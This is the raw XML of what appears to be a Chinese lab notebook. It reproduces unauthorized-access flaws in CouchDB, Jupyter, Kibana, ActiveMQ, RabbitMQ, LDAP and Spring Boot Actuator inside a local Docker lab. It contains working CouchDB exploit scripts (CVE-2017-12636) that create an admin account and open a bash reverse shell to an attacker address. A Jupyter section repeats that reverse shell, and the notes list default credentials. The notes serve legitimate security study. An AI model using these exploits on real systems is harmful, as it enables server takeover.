            <wp:extent cx="5267325" cy="936625"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="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6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"http://127.0.0.1:5984/_utils/" \l "login"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http://127.0.0.1:5984/_utils/#login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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4711700" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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想获取shell，但未成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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#!/usr/bin/env python3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requests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 requests.auth import HTTPBasicAuth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target = 'http://172.20.10.8:5984'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command = '"bash -i &gt;&amp; /dev/tcp/192.168.131.129/4444 0&gt;&amp;1"'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version = 3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= requests.session()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session.headers = {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'Content-Type': 'application/json'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session.proxies = {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    'http': 'http://127.0.0.1:8085'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}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session.put(target + '/_users/org.couchdb.user:wooyun', data='''{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"type": "user",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"name": "wooyun",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"roles": ["_admin"],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"roles": [],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"password": "wooyun"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}''')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session.auth = HTTPBasicAuth('wooyun', 'wooyun')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version == 1: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session.put(target + ('/_config/query_servers/cmd'), data=command)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else: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host = session.get(target + '/_membership').json()['all_nodes'][0]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session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)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session.put(target + '/wooyun')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session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')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version == 1: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session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')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else: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session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')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使用docker搭建的环境：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[root@localhsot ~]# cd /root/vulhub-master/couchdb/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[root@localhsot couchdb]# cd CVE-2017-12636/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[root@localhsot CVE-2017-12636]# LS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bash: LS: 未找到命令...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相似命令是： 'ls'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[root@localhsot CVE-2017-12636]# docker-compose build&amp;&amp;docker-compose up -d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"http://192.168.131.128:5984/_config"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http://192.168.131.128:5984/_config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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2188210"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890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88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使用exp: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#!/usr/bin/env python3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requests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json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base64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 requests.auth import HTTPBasicAuth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target = 'http://192.168.131.128:5984'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command = rb"""sh -i &gt;&amp; /dev/tcp/192.168.131.129/4444 0&gt;&amp;1"""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version = 1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= requests.session()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session.headers = {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'Content-Type': 'application/json'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session.proxies = {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    'http': 'http://127.0.0.1:8085'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}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session.put(target + '/_users/org.couchdb.user:wooyun', data='''{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"type": "user",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"name": "wooyun",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"roles": ["_admin"],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"roles": [],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"password": "wooyun"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}''')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session.auth = HTTPBasicAuth('wooyun', 'wooyun')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command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()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version == 1: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session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))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else: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host = session.get(target + '/_membership').json()['all_nodes'][0]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session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))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session.put(target + '/wooyun')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session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')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version == 1: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session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')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else: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session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')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kali先开启端口监听：nc -lvp 4444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然后执行exp:python3 exp.py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Kali上成功获取到shell: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3343275"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="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40" w:name="_Toc21289"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LDAP未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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参考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"https://www.cnblogs.com/Zh1z3ven/p/13894171.html"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https://www.cnblogs.com/Zh1z3ven/p/13894171.html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410075" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="56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 descr="IMG_2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41" w:name="_Toc32238"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ActiveMQ未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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实际上是弱口令。。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc6209"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/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参考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"https://blog.csdn.net/u012249177/article/details/81294334"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https://blog.csdn.net/u012249177/article/details/81294334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pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc32409"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/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instrText xml:space="preserve"> HYPERLINK "http://192.168.131.128:8161/admin/" </w:instrTex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15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.131.128:8161/admin/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end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admin/admin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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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293745"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255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93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44" w:name="_Toc23564"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Jupyter Notebook未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc16623"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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vulhub-master]# cd jupyter/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jupyter]# ls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notebook-rce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jupyter]# cd notebook-rce/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notebook-rce]# ls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1.png  2.png  docker-compose.yml  README.md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notebook-rce]# docker-compose build&amp;&amp;docker-compose up -d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访问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"http://192.168.131.128:8888/tree?"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http://192.168.131.128:8888/tree?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040" cy="1523365"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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23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6" w:name="_Toc20099"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175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8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969385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="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6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使用kali监听端口：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Nc -lvp 4444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然后在Terminal执行bash -i &gt;&amp; /dev/tcp/192.168.131.129/4444 0&gt;&amp;1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068705"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="6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68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Kali（192.168.131.129）成功获取shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4457700" cy="1879600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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87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47" w:name="_Toc5444"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kibana未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc17909"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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vulhub-master]# cd kibana/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kibana]# ls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CVE-2018-17246  CVE-2019-7609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[root@localhost kibana]#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kibana]# ls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CVE-2018-17246  CVE-2019-7609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kibana]# cd CVE-2018-17246/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CVE-2018-17246]# LS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bash: LS: 未找到命令...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相似命令是： 'ls'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CVE-2018-17246]# Ls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bash: Ls: 未找到命令...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相似命令是： 'ls'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CVE-2018-17246]# docker-compose build&amp;&amp;docker-compose up -d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49" w:name="_Toc27313"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/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无需登录，直接访问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"http://192.168.131.128:5601/app/kibana" \l "/"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http://192.168.131.128:5601/app/kibana#/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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"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0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50" w:name="_Toc18177"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RabbitMQ未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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实际上是弱口令。。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc17849"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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搭建参考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"https://blog.csdn.net/qq_17623363/article/details/99694261"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https://blog.csdn.net/qq_17623363/article/details/99694261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"http://192.168.131.128:15672/"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5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.131.128:15672/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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5269230" cy="1850390"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="6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5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52" w:name="_Toc29964"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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使用guest/guest登录：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604260"/>
            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
            <wp:docPr id="6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53" w:name="_Toc29007"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Springboot actuator未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc30653"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/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参考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"https://github.com/callicoder/spring-boot-actuator-demo"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https://github.com/callicoder/spring-boot-actuator-demo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55" w:name="_Toc25855"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/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访问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"http://192.168.131.128:8080/"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http://192.168.131.128:8080/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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3905250" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0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39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"http://192.168.131.128:8080/actuator/info"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http://192.168.131.128:8080/actuator/info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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1117600"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0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1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"http://192.168.131.128:8080/actuator/env"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http://192.168.131.128:8080/actuator/env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/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2402840"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1016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02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其他利用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="16"/>
        <w:tblW w:w="7120" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4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452"/>
        <w:gridCol w:w="1204"/>
        <w:gridCol w:w="5464"/>
      </w:tblGrid>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4F4F4F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/autoconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>提供了一份自动配置报告，记录哪些自动配置条件通过了，哪些没通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/configprops</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>描述配置属性（包含默认值）如何注入 Bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/beans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>描述应用程序上下文里全部的 Bean，以及它们的关系</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>获取线程活动的快照</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>获取全部环境属性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/env/{name}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>根据名称获取特定的环境属性值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>报告应用程序的健康指标，这些值由 HealthIndicator 的实现类提供</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>获取应用程序的定制信息，这些信息由 info 打头的属性提供</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>描述全部的 URI 路径，以及它们和控制器（包含 Actuator 端点）的映射关系</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>报告各种应用程序度量信息，比如内存用量和 HTTP 请求计数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/metrics/{name}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>报告指定名称的应用程序度量值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
